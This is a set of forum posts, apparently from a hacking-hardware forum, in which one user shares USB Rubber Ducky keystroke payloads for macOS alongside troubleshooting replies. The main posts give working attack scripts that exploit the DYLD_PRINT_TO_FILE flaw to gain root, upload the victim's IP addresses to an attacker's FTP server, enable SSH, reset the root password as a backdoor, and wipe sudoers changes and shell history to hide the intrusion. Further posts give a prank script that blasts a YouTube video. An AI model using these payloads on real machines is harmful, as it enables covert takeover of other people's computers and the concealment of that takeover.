V3sth4cks153

It is indeed ! I personally also prefer nano, but then I saw this text in the sudoers file which convinced me there must be a reason why Apple says to use visudo. # sudoers file. # # This file MUST be edited with the 'visudo' command as root. # Failure to use 'visudo' may result in syntax or file permission errors # that prevent sudo from running. # I also think Apple will likely be slow at patching this. But by searching for "DYLD_PRINT_TO_FILE post module" on Google, I found this which pretty much means that if an attacker has user-level control of your Mac already, he can use this module to take full control of the machine, even without physical access ! But since it's already been 5 days since this has been discovered, I find it really unlikely that Apple will release a patch.

Hi everyone ! Following my previous post on an adaptation of the recently discovered DYLD_PRINT_TO_FILE privilege escalation vulnerability, I decided to create a full use of this adaptation. This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. The payload then activates the ssh daemon, changes the root password to anything you want, and uploads a text file containing both the internal and external IP adresses of the victim to an ftp server of your choice. The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app. The attacker can then SSH or SFTP to the victim machine using the modified root password and the IP adress in the text file. /!\ MAKE SURE TO REPLACE THE FTP SERVER ADRESS, USERNAME AND PASSWORD, AS WELL AS THE NEW ROOT PASSWORD WITH WHAT YOU WANT THEM TO BE ! /!\ I hope you like it ! ********************* USE THIS PAYLOAD AT YOUR OWN RISK ! ********************* Here is the code (also on my GitHub) : REM Author: V3sth4cks153 REM Title: OS X DYLD_PRINT_TO_FILE Root SSH Backdoor REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. REM The payload then activates the ssh daemon, and changes the root password to anything you want, and uploads a text file containing both the internal and external IP adresses of the victim to an ftp server of your choice. REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app. REM REM /!\ MAKE SURE TO REPLACE THE FTP SERVER ADRESS, USERNAME AND PASSWORD, AS WELL AS THE NEW ROOT PASSWORD WITH WHAT YOU WANT THEM TO BE ! /!\ REM REM ********************* USE THIS AT YOUR OWN RISK ********************* REM REM --------------- OPEN TERMINAL --------------- DELAY 3000 GUI SPACE DELAY 100 STRING Terminal DELAY 500 ENTER DELAY 1000 REM --------------- GO TO HOME DIRECTORY --------------- STRING cd ENTER DELAY 100 REM --------------- ESCALATE PRIVS --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER REM --------------- GET IP AND UPLOAD TO FTP --------------- DELAY 200 STRING curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//' > ip.txt ENTER DELAY 1200 STRING ifconfig |grep inet >> ip.txt ENTER DELAY 500 STRING ftp SERVER_ADRESS ENTER DELAY 500 STRING USERNAME ENTER DELAY 200 STRING PASSWORD ENTER DELAY 1000 STRING put ip.txt ENTER DELAY 1000 STRING exit ENTER DELAY 500 STRING rm ip.txt ENTER REM --------------- ENABLE SSH --------------- STRING systemsetup -f -setremotelogin on ENTER REM --------------- CHANGE ROOT PASSWORD --------------- STRING passwd ENTER STRING NEW_ROOT_PASSWORD ENTER DELAY 500 STRING NEW_ROOT_PASSWORD ENTER DELAY 1500 REM --------------- CLEANUP --------------- STRING cd ENTER STRING visudo -f /etc/sudoers ENTER DELAY 500 STRING :$d ENTER STRING :w ENTER STRING :x ENTER STRING history -c ENTER DELAY 100 STRING exit ENTER STRING history -c ENTER GUI q

Thanks ! I'm glad you like it ! You're right about the cleanup operation. The only problem I had is you can't edit the sudoers file with any editor other than visudo, which is basically VIM. I just found out today that by using the ":$d" command in visudo you could delete the last line. It is better in every way as the payload is then smaller, so faster ! I'm currently working on an application of this exploit, which uploads a text file containing the ip of the victim, and then changes the root password tom anything you want so that you can ssh/sftp to the victim ! I'll post it on the forums when it's done. DONE ! As for Apple, like it's said in the article, they generally don't patch current versions of their OS, but they include a fix in the next version instead. Which I hope they won't do this time since this is far more dangerous than just making your iPhone reboot ! Here is the modified code (It's also on my GitHub) : REM Author: V3sth4cks153 REM Title: DYLD_PRINT_TO_FILE Privilege Escalation + cleanup REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. REM This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between. REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app. REM REM ********************* USE THIS AT YOUR OWN RISK ********************* REM REM --------------- OPEN TERMINAL --------------- GUI SPACE DELAY 100 STRING Terminal DELAY 500 ENTER DELAY 1000 REM --------------- GO TO HOME DIRECTORY --------------- STRING cd ENTER DELAY 100 REM --------------- ESCALATE PRIVS --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER REM * * REM ********************* YOU CAN PUT ANYTHING YOU WANT ROOT TO DO HERE ********************* REM * * REM --------------- CLEANUP --------------- STRING cd ENTER STRING visudo -f /etc/sudoers ENTER DELAY 500 STRING :$d ENTER STRING :w ENTER STRING :x ENTER STRING history -c ENTER DELAY 100 STRING exit ENTER STRING history -c ENTER GUI q

Oh yeah hadn't seen that ! My bad.

I don't know if this makes sense but maybe he's talking about Dynamic DNS like No-IP or DynDNS ? To make it so that you can see the feed from anywhere.

Did you add delays in your payload ? If not, do so. If you did, try increasing them, or using the DEFAULT_DELAY command. I hope this helps you ! V3sth4cks153.

Hi everyone ! I just saw this on thehackernews.com, and I thought I'd make a Rubber Ducky Payload for it. This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between. The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app. I've successfully tested this on an Early 2013 MacBook Pro Retina 15'' running OS X 10.10.3 Yosemite. NOTE: Since the payload uses the username of the victim, I had to make it delete a bit more than the exact length of the added text in the sudoers file (the exploit command adds this to the sudoers file, located at /etc/sudoers : "username ALL=(ALL) NOPASSWD:ALL"). This shouldn't be a problem because the last few lines are commented out. Also having a super, super long username, like 30ish characters (which I dont event know if it's possible) can be a problem. If ever you need it, here is the default sudoers file for Mac OS X 10.10 Yosemite. Hope you like it ! ********************* USE THIS PAYLOAD AT YOUR OWN RISK ! ********************* Here is the code: REM Author: V3sth4cks153 REM Title: DYLD_PRINT_TO_FILE Privilege Escalation + cleanup REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. REM This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between. REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app. REM REM ********************* USE THIS AT YOUR OWN RISK ********************* REM REM --------------- OPEN TERMINAL --------------- GUI SPACE DELAY 100 STRING Terminal DELAY 500 ENTER DELAY 1000 REM --------------- GO TO HOME DIRECTORY --------------- STRING cd ENTER DELAY 100 REM --------------- ESCALATE PRIVS --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER REM * * REM ********************* YOU CAN PUT ANYTHING YOU WANT ROOT TO DO HERE ********************* REM * * REM --------------- CLEANUP --------------- STRING cd ENTER STRING visudo -f /etc/sudoers ENTER DOWNARROW REPEAT 50 RIGHTARROW REPEAT 40 STRING i RIGHTARROW BACKSPACE REPEAT 35 ESC STRING :w ENTER STRING :x ENTER STRING history -c ENTER DELAY 100 STRING exit ENTER STRING history -c ENTER GUI q

You're right, it is, but only as a hex file, and if I'm not mistaken, the .hex file a compiled file, ready to be flashed onto the Ducky, and it looks like shamwow is actually looking for the source code of that particular firmware.

Ok ! My bad !

I think that's what you're looking for: https://github.com/midnitesnake/USB-Rubber-Ducky/tree/master/Firmware/Images

Once you've got your payload in a text file, you need to use the Duck Encoder to encode it. Then you have to place the inject.bin file (the encoded file) on the root of the Duck's Micro SD card. You can encode the file directly on your computer using the encoder.jar located here: https://github.com/midnitesnake/USB-Rubber-Ducky , or you use the online encoder: http://www.ducktoolkit.com/Encoder.jsp I hope this helps !

Hi everyone ! I wrote a simple and fast Ducky script that changes the wallpaper to any image you want from the Internet (read the REMs in the code for more information). You just have to replace the URL and file name in the script, and you're good to go ! (The link I put there is a cool hi-res matrix wallpaper) You may have to change the delays a bit if you've got a slow computer or a slow internet connection. I've successfully tested this on an Early 2013 MacBook Pro Retina 15'' running OS X 10.10 Yosemite. Please let me know if this script works for you and if you find any errors or any improvements that could be made. Here is the code: REM Author: V3sth4cks153 REM Title: OS X Wallpaper changer REM This script uses curl and osascript, which are both by default on Mac OS X, to download an image from the Internet, set it as wallpaper, and then delete the downloaded file and the Terminal history. REM NOTE: You may have to change the delays a bit if you have a slow computer or a slow internet connection DELAY 3000 REM --------------- OPEN TERMINAL --------------- GUI SPACE STRING Terminal DELAY 500 ENTER DELAY 1000 REM --------------- GO TO HOME DIRECTORY --------------- STRING cd ENTER DELAY 100 REM --------------- DOWNLOAD --------------- STRING curl -O http://img1.gtsstatic.com/wallpapers/3fea1154de2c3c2fe6a325c56618c5f2_large.jpeg ENTER DELAY 1500 REM --------------- COPY TO DESKTOP --------------- STRING cp 3fea1154de2c3c2fe6a325c56618c5f2_large.jpeg Desktop/ ENTER REM --------------- CHANGE DESKTOP --------------- DELAY 200 STRING osascript << EOF ENTER STRING tell application "Finder" ENTER STRING set desktop picture to file "3fea1154de2c3c2fe6a325c56618c5f2_large.jpeg" of desktop ENTER STRING end tell ENTER STRING EOF ENTER DELAY 100 REM --------------- CLEANUP --------------- STRING rm 3fea1154de2c3c2fe6a325c56618c5f2_large.jpeg ENTER STRING cd Desktop/ ENTER STRING rm 3fea1154de2c3c2fe6a325c56618c5f2_large.jpeg ENTER DELAY 100 STRING cd ENTER DELAY 50 STRING history -c ENTER GUI w DELAY 100 GUI q

Hello everyone ! I just got my ducky and just created my first payload. It's a covert youtube blaster based on Cody Theodore’s OSX Youtube Blast from the payload wiki, but with a few improvements such as hiding the Safari window and quitting the Terminal app for cleanup. I've only tested this payload on Mac OSX 10.10 Yosemite computers, but it should work on lower versions. Here is the code: REM Author: V3sth4cks153 REM Title: OS X Covert Youtube Blaster REM This payload is based on Cody Theodore’s OSX Youtube Blast from the payload wiki, but I made a few improvements such as hiding the Safari window and quitting the Terminal app for cleanup REM ---------------Open Terminal via Spotlight--------------- DELAY 3000 GUI SPACE DELAY 500 STRING Terminal DELAY 750 ENTER DELAY 1000 REM ---------------Set the volume to maximum--------------- STRING osascript -e 'set volume 10' DELAY 200 ENTER DELAY 200 REM ---------------Open youtube link in the default web browser--------------- STRING open DELAY 500 ENTER DELAY 750 REM ---------------Hide the Safari window--------------- GUI h DELAY 750 REM ---------------Quit the Terminal--------------- GUI q Please let me know if this payload works for you, and if you spot any errors that could be corrected or improvements that could be made ! V3sth4cks153.

I have this exact one and it works. I use it for wardriving.

Ok ! I tried it with running persistence, and it worked flawlessly ! I'm going to try it with multiple commands when I get the time...

You're welcome ! Did you test it ??

I googled that a while ago and it seems like you can, and that it's even been implemented in Metasploit : https://offensiveinfosec.wordpress.com/tag/autorunscript/ Just have to change the commands in the rc file to the ones you want and it should work. I didn't test it though...

I really like that idea !

The Hyperlinks are cut in two... Try copying and pasting the links instead. This worked for me.

Works perfectly ! Thanks a lot !

It unlocks at the "Hackling" level

You're welcome !

You're supposed to enter whaterver you want. The WPA2 secure setup is just to control the pineapple over wifi. It's only for customization purposes as far as I know. Don't worry, it's not a test

Ok so I've tested this a few times, and it seems like kismet_server doesn't fail cleanly if the power is cut. However, I found that if I ssh in and kill the service with this command: kill -15 <pid> kismet_server quits cleanly, and I can then cut the power. Also, using the GPS in serial is perfect, and far easier that GPSD. Thanks barry99705 and Sebkinne for your help ! Problem solved ! EDIT: Just came back from a test run, and it seems like I can't kill the process after sometime, even though I run the command... Any ideas why that might happen ?

Can you try it without "gufw" ? Just like that: "apt-get -f install". If that doesn't work, I really don't know what the problem is...